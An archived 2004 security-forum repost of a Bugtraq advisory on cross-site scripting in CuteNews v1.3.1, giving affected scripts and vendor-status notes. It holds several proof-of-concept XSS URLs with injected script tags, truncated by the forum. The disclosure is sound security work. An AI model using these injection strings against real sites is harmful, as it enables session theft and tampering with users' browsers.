hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Cross-site Scripting Cutenews
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Jun 28 2004, 05:51 PM
QUOTE


PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.1
  BUG: Cross-Site Scripting
  DATE: 23/05/2004
  AUTHOR: DarkBicho
         
-----------------------------------------------------------------------------------------------


1.- Affected software description:
    -----------------------------


    CuteNews is a popular News Publishing, written in php by
    CutePHP.


2.- Vulnerabilities:
    ---------------


    A. Cross-Site Scripting aka XSS:


    :.: In Id :
http://attacker/show_archives.php?subactio...rt_from=&ucat=&


http://attacker/show_news.php?subaction=sh...rt_from=&ucat=&


http://attacker/example1.php?subaction=sho...</script>


http://attacker/example2.php?subaction=sho...</script>

   
   
3.- SOLUTION:
    จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------


        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho_at_peru.com




Source: http://seclists.org/lists/bugtraq/2004/Jun/0438.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.